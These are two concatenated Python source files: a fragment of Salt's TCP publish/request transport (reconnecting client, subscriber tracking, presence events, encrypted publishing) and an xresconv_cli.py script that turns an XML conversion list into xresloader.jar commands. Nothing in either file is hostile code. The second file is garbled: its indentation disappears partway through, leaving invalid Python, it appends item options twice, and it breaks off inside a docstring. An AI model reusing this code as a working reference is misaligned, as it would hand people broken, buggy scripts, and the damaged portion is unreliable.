        self.disconnect_callback = None

    def __del__(self):
        self.close()

    def connect(self):
        '''
        Ask for this client to reconnect to the origin
        '''
        if hasattr(self, '_connecting_future') and not self._connecting_future.done():
            # A connect is already in flight; share its future.
            future = self._connecting_future
        else:
            future = tornado.concurrent.Future()
            self._connecting_future = future
            self.io_loop.add_callback(self._connect)

            # Add the callback only when a new future is created
            if self.connect_callback is not None:
                def handle_future(future):
                    response = future.result()
                    self.io_loop.add_callback(self.connect_callback, response)
                future.add_done_callback(handle_future)

        return future

    # TODO: tcp backoff opts
    @tornado.gen.coroutine
    def _connect(self):
        '''
        Try to connect for the rest of time!
        '''
        while True:
            if self._closing:
                break
            try:
                kwargs = {}
                if self.source_ip or self.source_port:
                    if tornado.version_info >= (4, 5):
                        ### source_ip and source_port are supported only in Tornado >= 4.5
                        # See http://www.tornadoweb.org/en/stable/releases/v4.5.0.html
                        # Otherwise will just ignore these args
                        kwargs = {'source_ip': self.source_ip,
                                  'source_port': self.source_port}
                    else:
                        log.warning('If you need a certain source IP/port, consider upgrading Tornado >= 4.5')
                with salt.utils.asynchronous.current_ioloop(self.io_loop):
                    self._stream = yield self._tcp_client.connect(self.host,
                                                                  self.port,
                                                                  ssl_options=self.opts.get('ssl'),
                                                                  **kwargs)
                self._connecting_future.set_result(True)
                break
            except Exception as e:
                # Connection failed; keep retrying forever.
                yield tornado.gen.sleep(1)  # TODO: backoff
                #self._connecting_future.set_exception(e)

    @tornado.gen.coroutine
    def _stream_return(self):
        # Reader loop: resolves reply futures by message id and dispatches
        # unsolicited messages to the on_recv callback. Reconnects on error.
        try:
            while not self._closing and (
                    not self._connecting_future.done() or
                    self._connecting_future.result() is not True):
                yield self._connecting_future
            unpacker = msgpack.Unpacker()
            while not self._closing:
                try:
                    self._read_until_future = self._stream.read_bytes(4096, partial=True)
                    wire_bytes = yield self._read_until_future
                    unpacker.feed(wire_bytes)
                    for framed_msg in unpacker:
                        if six.PY3:
                            framed_msg = salt.transport.frame.decode_embedded_strs(
                                framed_msg
                            )
                        header = framed_msg['head']
                        body = framed_msg['body']
                        message_id = header.get('mid')

                        if message_id in self.send_future_map:
                            # Reply to a request we sent: resolve its future.
                            self.send_future_map.pop(message_id).set_result(body)
                            self.remove_message_timeout(message_id)
                        else:
                            if self._on_recv is not None:
                                self.io_loop.spawn_callback(self._on_recv, header, body)
                            else:
                                log.error('Got response for message_id %s that we are not tracking', message_id)
                except tornado.iostream.StreamClosedError as e:
                    log.debug('tcp stream to %s:%s closed, unable to recv', self.host, self.port)
                    # Fail all in-flight requests, then reconnect.
                    for future in six.itervalues(self.send_future_map):
                        future.set_exception(e)
                    self.send_future_map = {}
                    if self._closing:
                        return
                    if self.disconnect_callback:
                        self.disconnect_callback()
                    # if the last connect finished, then we need to make a new one
                    if self._connecting_future.done():
                        self._connecting_future = self.connect()
                    yield self._connecting_future
                except TypeError:
                    # This is an invalid transport
                    if 'detect_mode' in self.opts:
                        log.info('There was an error trying to use TCP transport; '
                                 'attempting to fallback to another transport')
                    else:
                        raise SaltClientError
                except Exception as e:
                    log.error('Exception parsing response', exc_info=True)
                    for future in six.itervalues(self.send_future_map):
                        future.set_exception(e)
                    self.send_future_map = {}
                    if self._closing:
                        return
                    if self.disconnect_callback:
                        self.disconnect_callback()
                    # if the last connect finished, then we need to make a new one
                    if self._connecting_future.done():
                        self._connecting_future = self.connect()
                    yield self._connecting_future
        finally:
            # Signal close() that the reader coroutine has finished.
            self._stream_return_future.set_result(True)

    @tornado.gen.coroutine
    def _stream_send(self):
        # Writer loop: drains the send queue; spawned lazily by send() when
        # the queue transitions from empty to non-empty.
        while not self._connecting_future.done() or self._connecting_future.result() is not True:
            yield self._connecting_future
        while len(self.send_queue) > 0:
            message_id, item = self.send_queue[0]
            try:
                yield self._stream.write(item)
                del self.send_queue[0]
            # if the connection is dead, lets fail this send, and make sure we
            # attempt to reconnect
            except tornado.iostream.StreamClosedError as e:
                if message_id in self.send_future_map:
                    self.send_future_map.pop(message_id).set_exception(e)
                self.remove_message_timeout(message_id)
                del self.send_queue[0]
                if self._closing:
                    return
                if self.disconnect_callback:
                    self.disconnect_callback()
                # if the last connect finished, then we need to make a new one
                if self._connecting_future.done():
                    self._connecting_future = self.connect()
                yield self._connecting_future

    def _message_id(self):
        # Return the next free message id, wrapping at _max_messages; ids
        # still in send_future_map are in use and skipped.
        wrap = False
        while self._mid in self.send_future_map:
            if self._mid >= self._max_messages:
                if wrap:
                    # this shouldn't ever happen, but just in case
                    raise Exception('Unable to find available messageid')
                self._mid = 1
                wrap = True
            else:
                self._mid += 1

        return self._mid

    # TODO: return a message object which takes care of multiplexing?
    def on_recv(self, callback):
        '''
        Register a callback for received messages (that we didn't initiate)
        '''
        if callback is None:
            self._on_recv = callback
        else:
            def wrap_recv(header, body):
                callback(body)
            self._on_recv = wrap_recv

    def remove_message_timeout(self, message_id):
        # Cancel the pending timeout callback for a message, if any.
        if message_id not in self.send_timeout_map:
            return
        timeout = self.send_timeout_map.pop(message_id)
        self.io_loop.remove_timeout(timeout)

    def timeout_message(self, message_id):
        # Fired by the IO loop when a reply did not arrive in time; fails the
        # caller's future with SaltReqTimeoutError.
        if message_id in self.send_timeout_map:
            del self.send_timeout_map[message_id]
        if message_id in self.send_future_map:
            self.send_future_map.pop(message_id).set_exception(
                SaltReqTimeoutError('Message timed out')
            )

    def send(self, msg, timeout=None, callback=None, raw=False):
        '''
        Send given message, and return a future
        '''
        message_id = self._message_id()
        header = {'mid': message_id}

        future = tornado.concurrent.Future()
        if callback is not None:
            def handle_future(future):
                response = future.result()
                self.io_loop.add_callback(callback, response)
            future.add_done_callback(handle_future)
        # Add this future to the mapping
        self.send_future_map[message_id] = future

        if self.opts.get('detect_mode') is True:
            # In transport-detection mode fail fast.
            timeout = 1

        if timeout is not None:
            send_timeout = self.io_loop.call_later(timeout, self.timeout_message, message_id)
            self.send_timeout_map[message_id] = send_timeout

        # if we don't have a send queue, we need to spawn the callback to do the sending
        if len(self.send_queue) == 0:
            self.io_loop.spawn_callback(self._stream_send)
        self.send_queue.append((message_id, salt.transport.frame.frame_msg(msg, header=header)))
        return future
class Subscriber(object):
    '''
    Client object for use with the TCP publisher server
    '''
    def __init__(self, stream, address):
        # tornado IOStream for this subscriber connection
        self.stream = stream
        self.address = address
        self._closing = False
        self._read_until_future = None
        # Minion id; populated once the id/token message is verified
        self.id_ = None

    def close(self):
        # Idempotent: only the first call performs any work.
        if self._closing:
            return
        self._closing = True
        if self.stream.closed():
            return
        self.stream.close()
        if self._read_until_future is None:
            return
        # Retrieve the pending read's exception info so tornado does not log
        # '[ERROR ] Future exception was never retrieved: StreamClosedError'
        # (the reader is always waiting on the next message when the stream
        # goes away).
        self._read_until_future.exc_info()

    def __del__(self):
        self.close()
class PubServer(tornado.tcpserver.TCPServer, object):
    '''
    TCP publisher
    '''
    def __init__(self, opts, io_loop=None):
        super(PubServer, self).__init__(ssl_options=opts.get('ssl'))
        self.io_loop = io_loop
        self.opts = opts
        self._closing = False
        # All currently connected Subscriber objects
        self.clients = set()
        # Used to verify minion id/token pairs sent on the publish stream
        self.aes_funcs = salt.master.AESFuncs(self.opts)
        # minion id -> set(Subscriber); usually one entry per id, more if a
        # minion reconnected before its dead stream was detected
        self.present = {}
        self.presence_events = False
        if self.opts.get('presence_events', False):
            tcp_only = True
            for transport, _ in iter_transport_opts(self.opts):
                if transport != 'tcp':
                    tcp_only = False
            if tcp_only:
                # Only when the transport is TCP only, the presence events will
                # be handled here. Otherwise, it will be handled in the
                # 'Maintenance' process.
                self.presence_events = True
        if self.presence_events:
            self.event = salt.utils.event.get_event(
                'master',
                opts=self.opts,
                listen=False
            )

    def close(self):
        if self._closing:
            return
        self._closing = True

    def __del__(self):
        self.close()

    def _add_client_present(self, client):
        # Record that a validated minion id is connected; fire presence
        # events only when the id is newly present.
        id_ = client.id_
        if id_ in self.present:
            clients = self.present[id_]
            clients.add(client)
        else:
            self.present[id_] = set([client])
            if self.presence_events:
                data = {'new': [id_],
                        'lost': []}
                self.event.fire_event(
                    data,
                    salt.utils.event.tagify('change', 'presence')
                )
                data = {'present': list(self.present.keys())}
                self.event.fire_event(
                    data,
                    salt.utils.event.tagify('present', 'presence')
                )

    def _remove_client_present(self, client):
        id_ = client.id_
        if id_ is None or id_ not in self.present:
            # This is possible if _remove_client_present() is invoked
            # before the minion's id is validated.
            return

        clients = self.present[id_]
        if client not in clients:
            # Since _remove_client_present() is potentially called from
            # _stream_read() and/or publish_payload(), it is possible for
            # it to be called twice, in which case we will get here.
            # This is not an abnormal case, so no logging is required.
            return

        clients.remove(client)
        if len(clients) == 0:
            # Last connection for this id is gone; fire presence events.
            del self.present[id_]
            if self.presence_events:
                data = {'new': [],
                        'lost': [id_]}
                self.event.fire_event(
                    data,
                    salt.utils.event.tagify('change', 'presence')
                )
                data = {'present': list(self.present.keys())}
                self.event.fire_event(
                    data,
                    salt.utils.event.tagify('present', 'presence')
                )

    @tornado.gen.coroutine
    def _stream_read(self, client):
        # Per-subscriber reader: the only inbound traffic expected is the
        # AES-encrypted id/token message used to register presence.
        unpacker = msgpack.Unpacker()
        while not self._closing:
            try:
                client._read_until_future = client.stream.read_bytes(4096, partial=True)
                wire_bytes = yield client._read_until_future
                unpacker.feed(wire_bytes)
                for framed_msg in unpacker:
                    if six.PY3:
                        framed_msg = salt.transport.frame.decode_embedded_strs(
                            framed_msg
                        )
                    body = framed_msg['body']
                    if body['enc'] != 'aes':
                        # We only accept 'aes' encoded messages for 'id'
                        continue
                    crypticle = salt.crypt.Crypticle(self.opts, salt.master.SMaster.secrets['aes']['secret'].value)
                    load = crypticle.loads(body['load'])
                    if six.PY3:
                        load = salt.transport.frame.decode_embedded_strs(load)
                    if not self.aes_funcs.verify_minion(load['id'], load['tok']):
                        continue
                    client.id_ = load['id']
                    self._add_client_present(client)
            except tornado.iostream.StreamClosedError as e:
                log.debug('tcp stream to %s closed, unable to recv', client.address)
                client.close()
                self._remove_client_present(client)
                self.clients.discard(client)
                break
            except Exception as e:
                log.error('Exception parsing response', exc_info=True)
                continue

    def handle_stream(self, stream, address):
        # tornado TCPServer hook: one Subscriber per accepted connection.
        log.trace('Subscriber at %s connected', address)
        client = Subscriber(stream, address)
        self.clients.add(client)
        self.io_loop.spawn_callback(self._stream_read, client)

    # TODO: ACK the publish through IPC
    @tornado.gen.coroutine
    def publish_payload(self, package, _):
        # Fan a framed publish payload out to subscribers; 'topic_lst'
        # restricts delivery to specific minion ids, otherwise broadcast.
        log.debug('TCP PubServer sending payload: %s', package)
        payload = salt.transport.frame.frame_msg(package['payload'])

        to_remove = []
        if 'topic_lst' in package:
            topic_lst = package['topic_lst']
            for topic in topic_lst:
                if topic in self.present:
                    # This will rarely be a list of more than 1 item. It will
                    # be more than 1 item if the minion disconnects from the
                    # master in an unclean manner (eg cable yank), then
                    # restarts and the master is yet to detect the disconnect
                    # via TCP keep-alive.
                    for client in self.present[topic]:
                        try:
                            # Write the packed str
                            f = client.stream.write(payload)
                            self.io_loop.add_future(f, lambda f: True)
                        except tornado.iostream.StreamClosedError:
                            to_remove.append(client)
                else:
                    log.debug('Publish target %s not connected', topic)
        else:
            for client in self.clients:
                try:
                    # Write the packed str
                    f = client.stream.write(payload)
                    self.io_loop.add_future(f, lambda f: True)
                except tornado.iostream.StreamClosedError:
                    to_remove.append(client)
        for client in to_remove:
            log.debug('Subscriber at %s has disconnected from publisher', client.address)
            client.close()
            self._remove_client_present(client)
            self.clients.discard(client)
        log.trace('TCP PubServer finished publishing payload')
class TCPPubServerChannel(salt.transport.server.PubServerChannel):
    '''
    TCP publish-server channel: runs the PubServer in a dedicated daemon
    process and forwards publish loads to it over a local IPC socket.
    '''
    # TODO: opts!
    # Based on default used in tornado.netutil.bind_sockets()
    backlog = 128

    def __init__(self, opts):
        self.opts = opts
        self.serial = salt.payload.Serial(self.opts)  # TODO: in init?
        self.ckminions = salt.utils.minions.CkMinions(opts)
        self.io_loop = None

    def __setstate__(self, state):
        # Restore the shared master secrets when unpickled in a new process.
        salt.master.SMaster.secrets = state['secrets']
        self.__init__(state['opts'])

    def __getstate__(self):
        return {'opts': self.opts,
                'secrets': salt.master.SMaster.secrets}

    def _publish_daemon(self, log_queue=None):
        '''
        Bind to the interface specified in the configuration file
        '''
        salt.utils.process.appendproctitle(self.__class__.__name__)

        if log_queue is not None:
            salt.log.setup.set_multiprocessing_logging_queue(log_queue)
            salt.log.setup.setup_multiprocessing_logging(log_queue)

        # Check if io_loop was set outside
        if self.io_loop is None:
            self.io_loop = tornado.ioloop.IOLoop.current()

        # Spin up the publisher
        pub_server = PubServer(self.opts, io_loop=self.io_loop)
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        _set_tcp_keepalive(sock, self.opts)
        sock.setblocking(0)
        sock.bind((self.opts['interface'], int(self.opts['publish_port'])))
        sock.listen(self.backlog)
        # pub_server will take ownership of the socket
        pub_server.add_socket(sock)

        # Set up Salt IPC server
        if self.opts.get('ipc_mode', '') == 'tcp':
            pull_uri = int(self.opts.get('tcp_master_publish_pull', 4514))
        else:
            pull_uri = os.path.join(self.opts['sock_dir'], 'publish_pull.ipc')
        # Loads pushed by publish() arrive here and are fanned out by the
        # PubServer.
        pull_sock = salt.transport.ipc.IPCMessageServer(
            pull_uri,
            io_loop=self.io_loop,
            payload_handler=pub_server.publish_payload,
        )

        # Securely create socket
        log.info('Starting the Salt Puller on %s', pull_uri)
        old_umask = os.umask(0o177)
        try:
            pull_sock.start()
        finally:
            os.umask(old_umask)

        # run forever
        try:
            self.io_loop.start()
        except (KeyboardInterrupt, SystemExit):
            salt.log.setup.shutdown_multiprocessing_logging()

    def pre_fork(self, process_manager):
        '''
        Do anything necessary pre-fork. Since this is on the master side this will
        primarily be used to create IPC channels and create our daemon process to
        do the actual publishing
        '''
        kwargs = {}
        if salt.utils.platform.is_windows():
            kwargs['log_queue'] = (
                salt.log.setup.get_multiprocessing_logging_queue()
            )

        process_manager.add_process(self._publish_daemon, kwargs=kwargs)

    def publish(self, load):
        '''
        Publish "load" to minions
        '''
        payload = {'enc': 'aes'}

        crypticle = salt.crypt.Crypticle(self.opts, salt.master.SMaster.secrets['aes']['secret'].value)
        payload['load'] = crypticle.dumps(load)
        if self.opts['sign_pub_messages']:
            master_pem_path = os.path.join(self.opts['pki_dir'], 'master.pem')
            log.debug("Signing data packet")
            payload['sig'] = salt.crypt.sign_message(master_pem_path, payload['load'])
        # Use the Salt IPC server
        if self.opts.get('ipc_mode', '') == 'tcp':
            pull_uri = int(self.opts.get('tcp_master_publish_pull', 4514))
        else:
            pull_uri = os.path.join(self.opts['sock_dir'], 'publish_pull.ipc')
        # TODO: switch to the actual asynchronous interface
        #pub_sock = salt.transport.ipc.IPCMessageClient(self.opts, io_loop=self.io_loop)
        pub_sock = salt.utils.asynchronous.SyncWrapper(
            salt.transport.ipc.IPCMessageClient,
            (pull_uri,)
        )
        pub_sock.connect()

        int_payload = {'payload': self.serial.dumps(payload)}

        # add some targeting stuff for lists only (for now)
        if load['tgt_type'] == 'list':
            if isinstance(load['tgt'], six.string_types):
                # Fetch a list of minions that match
                _res = self.ckminions.check_minions(load['tgt'],
                                                    tgt_type=load['tgt_type'])
                match_ids = _res['minions']

                log.debug("Publish Side Match: %s", match_ids)
                # Send list of minions thru so zmq can target them
                int_payload['topic_lst'] = match_ids
            else:
                int_payload['topic_lst'] = load['tgt']
        # Send it over IPC!
        pub_sock.send(int_payload)
|
xresconv_cli.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import re
import sys
# ==================================================================================
import threading
import xml.etree.ElementTree as ET
from multiprocessing import cpu_count
from argparse import ArgumentParser
from subprocess import PIPE, Popen
from print_color import cprintf_stderr, cprintf_stdout, print_style
exit_code = 0
def main():
    """Parse the convert-list XML and drive xresloader.jar over the items.

    Reads one or more convert-list files (with includes), builds a list of
    xresloader command lines, and feeds them to parallel java workers.
    """
    console_encoding = sys.getfilesystemencoding()
    # Encoding used for all communication with the java child process.
    java_encoding = "utf-8"
    # Python 2 only: force the default encoding to utf-8.
    if 2 == sys.version_info[0] and "utf-8" != sys.getdefaultencoding().lower():
        try:
            sys.setdefaultencoding("utf-8")
        except LookupError:
            reload(sys)
            sys.setdefaultencoding("utf-8")
    xconv_split_by_spaces = re.compile("\\s+", re.IGNORECASE)
    # Central option store, merged from defaults, XML config and CLI flags.
    xconv_options = {
        "version": "1.3.1",
        "conv_list": None,
        "real_run": True,
        "args": {},
        "ext_args_l1": [],
        "ext_args_l2": [],
        "work_dir": ".",
        "xresloader_path": "xresloader.jar",
        "item": [],
        "parallelism": int((cpu_count() - 1) / 2) + 1,
        "java_options": [],
        "default_scheme": {},
        "data_version": None,
        "output_matrix": {"file_path": None, "outputs": []},
    }
    # Default to at most two worker threads; in practice the JVM's own runtime
    # optimization helps throughput more than extra threads do.
    if xconv_options["parallelism"] > 2:
        xconv_options["parallelism"] = 2
    # Nodes collected from the conv-list XML (and its includes).
    xconv_xml_global_nodes = []
    xconv_xml_list_item_nodes = []
    usage = "%(prog)s [options...] <convert list file> [-- [xresloader options...]]"
    parser = ArgumentParser(usage=usage)
    parser.add_argument(
        "-v",
        "--version",
        action="store_true",
        help="show version and exit",
        dest="version",
        default=False,
    )
    parser.add_argument(
        "-s",
        "--scheme-name",
        action="append",
        help="only convert schemes with name <scheme name>",
        metavar="<scheme>",
        dest="rule_schemes",
        default=[],
    )
    parser.add_argument(
        "-t",
        "--test",
        action="store_true",
        help="test run and show cmds",
        dest="test",
        default=False,
    )
    parser.add_argument(
        "-p",
        "--parallelism",
        action="store",
        help="set parallelism task number(default:"
        + str(xconv_options["parallelism"])
        + ")",
        metavar="<number>",
        dest="parallelism",
        type=int,
        default=xconv_options["parallelism"],
    )
    parser.add_argument(
        "-j",
        "--java-option",
        action="append",
        help="add java options to command(example: Xmx=2048m)",
        metavar="<java option>",
        dest="java_options",
        default=[],
    )
    parser.add_argument(
        "-a",
        "--data-version",
        action="store",
        help="set data version, if set it's will ignore the data_version option in convert list file",
        metavar="<version>",
        dest="data_version",
        default=None,
    )
    parser.add_argument(
        "convert_list_file",
        nargs="+",
        help="convert list file(xml) and options will be passed to xresloader.jar",
        metavar="<convert list file> [-- [xresloader options...]]",
        default=[],
    )
    options = parser.parse_args()
    if options.version:
        print(xconv_options["version"])
        exit(0)
    def print_help_msg(err_code):
        # Print usage and terminate with the given exit code.
        parser.print_help()
        exit(err_code)
    if 0 == len(options.convert_list_file):
        print_help_msg(-1)
    # First positional arg is the conv list; the rest is forwarded verbatim
    # to xresloader on every generated command line.
    xconv_options["conv_list"] = options.convert_list_file.pop(0)
    xconv_options["ext_args_l2"] = options.convert_list_file
    xconv_options["data_version"] = options.data_version
    # ========================================= global configuration parsing =========================================
    """ 读取xml文件 """
    def load_xml_file(file_path):
        """Parse a conv-list XML file, following <include> nodes recursively.

        Collects every <global> and <list>/<item> node (with its source file
        path) into the enclosing xconv_xml_* lists for later merging.
        """
        try:
            xml_doc = ET.parse(file_path)
        except ET.ParseError as ex:
            print(ex)
            cprintf_stderr([print_style.FC_RED], "[ERROR]: {0}" + os.linesep, ex)
            exit(-2)
        except EnvironmentError as ex:
            print(ex)
            cprintf_stderr([print_style.FC_RED], "[ERROR]: {0}" + os.linesep, ex)
            exit(-2)
        root_node = xml_doc.getroot()
        if root_node is None:
            print("[ERROR] root node not found in xml")
            print_help_msg(-3)
        # Enumerate <include> files first so included config is loaded
        # before this file's own nodes are appended.
        include_nodes = root_node.findall("./include")
        if include_nodes and len(include_nodes) > 0:
            dir_prefix = os.path.dirname(file_path)
            for include_node in include_nodes:
                include_file_path = include_node.text
                if include_file_path and len(include_file_path) > 1:
                    # Resolve relative paths against the including file's
                    # directory ("X:" guards against Windows drive paths).
                    if include_file_path[0] != "/" and include_file_path[1] != ":":
                        include_file_path = os.path.join(dir_prefix, include_file_path)
                    load_xml_file(include_file_path)
        global_nodes = root_node.findall("./global")
        if global_nodes and len(global_nodes) > 0:
            for node in global_nodes:
                xconv_xml_global_nodes.append({"file_path": file_path, "node": node})
        list_item_nodes = root_node.findall("./list/item")
        if list_item_nodes and len(list_item_nodes) > 0:
            for node in list_item_nodes:
                xconv_xml_list_item_nodes.append({"file_path": file_path, "node": node})
    load_xml_file(xconv_options["conv_list"])
    # Parse/merge the <global> configuration nodes.
    def load_global_options(gns):
        """Merge every <global> child option into xconv_options.

        Options seen later override or append to earlier ones; output_type
        rules are reset whenever they come from a different source file.
        """
        for global_node in gns:
            for global_option in global_node["node"]:
                tag_name = global_option.tag.lower()
                text_value = global_option.text
                if text_value:
                    trip_value = text_value.strip()
                else:
                    trip_value = None
                # Skip empty/whitespace-only options.
                if not trip_value:
                    continue
                if tag_name == "work_dir":
                    xconv_options["work_dir"] = text_value
                elif tag_name == "xresloader_path":
                    xconv_options["xresloader_path"] = text_value
                elif tag_name == "proto":
                    xconv_options["args"]["-p"] = trip_value
                elif tag_name == "output_type":
                    # output_type rules from a new file replace the previous
                    # file's rules instead of accumulating across files.
                    if (
                        global_node["file_path"]
                        != xconv_options["output_matrix"]["file_path"]
                    ):
                        xconv_options["output_matrix"]["outputs"] = []
                        xconv_options["output_matrix"]["file_path"] = global_node[
                            "file_path"
                        ]
                    output_rule = {
                        "type": trip_value,
                        "rename": None,
                        "tags": set(),
                        "classes": set(),
                    }
                    rename_rule = global_option.get("rename")
                    if rename_rule and rename_rule.strip():
                        output_rule["rename"] = rename_rule
                    tag_rule = global_option.get("tag")
                    if tag_rule and tag_rule.strip():
                        output_rule["tags"] = set(
                            filter(
                                lambda x: x,
                                xconv_split_by_spaces.split(tag_rule.strip()),
                            )
                        )
                    class_rule = global_option.get("class")
                    if class_rule and class_rule.strip():
                        output_rule["classes"] = set(
                            filter(
                                lambda x: x,
                                xconv_split_by_spaces.split(class_rule.strip()),
                            )
                        )
                    xconv_options["output_matrix"]["outputs"].append(output_rule)
                elif tag_name == "proto_file":
                    xconv_options["args"]["-f"] = '"' + text_value + '"'
                elif tag_name == "output_dir":
                    xconv_options["args"]["-o"] = '"' + text_value + '"'
                elif tag_name == "data_src_dir":
                    xconv_options["args"]["-d"] = '"' + text_value + '"'
                elif tag_name == "data_version":
                    # CLI -a/--data-version takes precedence when already set.
                    if xconv_options["data_version"] is None:
                        xconv_options["data_version"] = text_value
                elif tag_name == "rename":
                    xconv_options["args"]["-n"] = '"' + trip_value + '"'
                elif tag_name == "option":
                    xconv_options["ext_args_l1"].append(trip_value)
                elif tag_name == "java_option":
                    xconv_options["java_options"].append(trip_value)
                elif tag_name == "default_scheme":
                    if "name" in global_option.attrib:
                        scheme_key = global_option.attrib["name"]
                        if scheme_key in xconv_options["default_scheme"]:
                            # NOTE(review): appends the stripped value here but
                            # stores the unstripped text on first insert below —
                            # looks inconsistent; confirm intended behavior.
                            xconv_options["default_scheme"][scheme_key].append(
                                trip_value
                            )
                        else:
                            xconv_options["default_scheme"][scheme_key] = [text_value]
                else:
                    print("[ERROR] unknown global configure " + tag_name)
    if xconv_xml_global_nodes and len(xconv_xml_global_nodes) > 0:
        load_global_options(xconv_xml_global_nodes)
    # ----------------------------------------- global configuration parsed -----------------------------------------
    # Resolve the working directory: first relative to the conv list file,
    # then apply the configured work_dir on top of that.
    conv_list_dir = os.path.dirname(xconv_options["conv_list"])
    if conv_list_dir:
        os.chdir(conv_list_dir)
    os.chdir(xconv_options["work_dir"])
    conv_start_msg = (
        "[NOTICE] start to run conv cmds on dir: {0}" + os.linesep
    ).format(os.getcwd())
    if sys.version_info.major >= 3:
        cprintf_stdout([print_style.FC_YELLOW], conv_start_msg)
    else:
        # Python 2: try decoding with the console encoding; if that is not
        # supported fall back to writing the raw byte buffer.
        conv_compat_py2_write_buffer = False
        try:
            cprintf_stdout(
                [print_style.FC_YELLOW], conv_start_msg.decode(console_encoding)
            )
        except TypeError:
            conv_compat_py2_write_buffer = True
            cprintf_stdout([print_style.FC_YELLOW], conv_start_msg)
        except EnvironmentError:
            conv_compat_py2_write_buffer = True
            cprintf_stdout([print_style.FC_YELLOW], conv_start_msg)
    # NOTE(review): conv_compat_py2_write_buffer is only bound on the Python 2
    # path; later readers check the interpreter version first, so that's safe.
    if not os.path.exists(xconv_options["xresloader_path"]):
        cprintf_stderr(
            [print_style.FC_RED],
            "[ERROR] xresloader not found.({0}, you can download it from {1})"
            + os.linesep,
            xconv_options["xresloader_path"],
            "https://github.com/xresloader/xresloader/releases",
        )
        exit(-4)
    # ========================================= conversion list parsing =========================================
    # Parse/merge the <list>/<item> conversion entries.
    def load_list_item_nodes(lis):
        """Convert each <item> node into a conversion-item dict.

        An item is enabled when no -s/--scheme-name filter is given or its
        scheme matches one of the requested names.
        """
        for item_info in lis:
            item = item_info["node"]
            conv_item_obj = {
                "file": False,
                "scheme": False,
                "options": [],
                "enable": False,
                "scheme_data": {},
                "tags": set(),
                "classes": set(),
            }
            if "file" in item.attrib:
                conv_item_obj["file"] = item.attrib["file"]
            if "scheme" in item.attrib:
                conv_item_obj["scheme"] = item.attrib["scheme"]
            if "tag" in item.attrib:
                conv_item_obj["tags"] = set(
                    filter(lambda x: x, xconv_split_by_spaces.split(item.attrib["tag"]))
                )
            if "class" in item.attrib:
                conv_item_obj["classes"] = set(
                    filter(
                        lambda x: x, xconv_split_by_spaces.split(item.attrib["class"])
                    )
                )
            # Per-item extra xresloader options.
            for local_option in item.findall("./option"):
                text_value = local_option.text
                if text_value:
                    trip_value = text_value.strip()
                else:
                    trip_value = None
                if not trip_value:
                    continue
                conv_item_obj["options"].append(trip_value)
            # Per-item scheme overrides.
            for local_option in item.findall("./scheme"):
                text_value = local_option.text
                if text_value:
                    trip_value = text_value.strip()
                else:
                    trip_value = None
                if not trip_value:
                    continue
                if "name" in local_option.attrib:
                    scheme_key = local_option.attrib["name"]
                    if scheme_key and scheme_key in conv_item_obj["scheme_data"]:
                        conv_item_obj["scheme_data"][scheme_key].append(text_value)
                    else:
                        conv_item_obj["scheme_data"][scheme_key] = [text_value]
            # Fill in globally-configured default schemes not overridden above.
            for key in xconv_options["default_scheme"]:
                if key not in conv_item_obj["scheme_data"]:
                    conv_item_obj["scheme_data"][key] = xconv_options["default_scheme"][
                        key
                    ]
            # Apply the -s/--scheme-name filter.
            if (
                not options.rule_schemes
                or 0 == len(options.rule_schemes)
                or conv_item_obj["scheme"] in options.rule_schemes
            ):
                conv_item_obj["enable"] = True
            xconv_options["item"].append(conv_item_obj)
    if xconv_xml_list_item_nodes and len(xconv_xml_list_item_nodes) > 0:
        load_list_item_nodes(xconv_xml_list_item_nodes)
# ----------------------------------------- 转换配置解析 -----------------------------------------
# ========================================= 生成转换命令 =========================================
if not xconv_options["data_version"] is None:
xconv_options["args"]["-a"] = '"' + str(xconv_options["data_version"]) + '"'
# ++++++++++++++++++++++++++++++++++++++++++ 全局命令和配置 ++++++++++++++++++++++++++++++++++++++++++
global_cmd_args_map = xconv_options["args"].copy()
global_cmd_args_prefix_array = []
global_cmd_args_suffix_array = []
if len(xconv_options["ext_args_l1"]) > 0:
global_cmd_args_prefix_array.extend(xconv_options["ext_args_l1"])
# ++++++++++++++++++++++++++++++++++++++++++ 命令行参数 ++++++++++++++++++++++++++++++++++++++++++
if len(xconv_options["ext_args_l2"]) > 0:
global_cmd_args_suffix_array.extend(xconv_options["ext_args_l2"])
cmd_list = []
for conv_item in xconv_options["item"]:
if not conv_item["enable"]:
continue
item_output_matrix = xconv_options["output_matrix"]["outputs"]
if not item_output_matrix:
item_output_matrix = [{}]
for item_output in item_output_matrix:
item_cmd_args_array = []
# merge global options
item_cmd_args_map = global_cmd_args_map.copy()
if "type" in item_output and item_output["type"]:
item_cmd_args_map["-t"] = item_output["type"]
if "rename" in item_output and item_output["rename"]:
item_cmd_args_map["-n"] = '"{0}"'.format(item_output["rename"])
if "tags" in item_output and item_output["tags"]:
check_limit = False
for tag in item_output["tags"]:
if tag in conv_item["tags"]:
check_limit = True
break
if not check_limit:
continue
if "classes" in item_output and item_output["classes"]:
check_limit = False
for tag in item_output["classes"]:
if tag in conv_item["classes"]:
check_limit = True
break
if not check_limit:
continue
for key in item_cmd_args_map:
item_cmd_args_array.append(key)
item_cmd_args_array.append(item_cmd_args_map[key])
# add item options
item_cmd_args_array.extend(conv_item["options"])
if len(conv_item["options"]) > 0:
item_cmd_args_array.extend(conv_item["options"])
# add item scheme
if conv_item["file"] and conv_item["scheme"]:
item_cmd_args_array.append("-s")
item_cmd_args_array.append('"{:s}"'.format(conv_item["file"]))
item_cmd_args_array.append("-m")
item_cmd_args_array.append('"{:s}"'.format(conv_item["scheme"]))
else:
for key in conv_item["scheme_data"]:
for opt_val in conv_item["scheme_data"][key]:
item_cmd_args_array.append("-m")
item_cmd_args_array.append('"{:s}={:s}"'.format(key, opt_val))
item_cmd_args_array.extend(global_cmd_args_suffix_array)
cmd_list.append(item_cmd_args_array)
cmd_list.reverse()
# ----------------------------------------- 生成转换命令 -----------------------------------------
all_worker_thread = []
cmd_picker_lock = threading.Lock()
def print_buffer_to_fd(fd, buffer):
if sys.version_info.major >= 3:
fd.write(buffer.decode(java_encoding))
else:
if console_encoding == java_encoding or conv_compat_py2_write_buffer:
sys.stderr.write(buffer)
else:
sys.stderr.write(buffer.decode(java_encoding))
def print_stdout_func(pexec):
for output_line in pexec.stdout.readlines():
print_buffer_to_fd(sys.stdout, output_line)
def print_stderr_func(pexec):
for output_line in pexec.stderr.readlines():
print_buffer_to_fd(sys.stderr, output_line)
    def worker_func(idx):
        """Worker thread: feed batches of commands to one xresloader process.

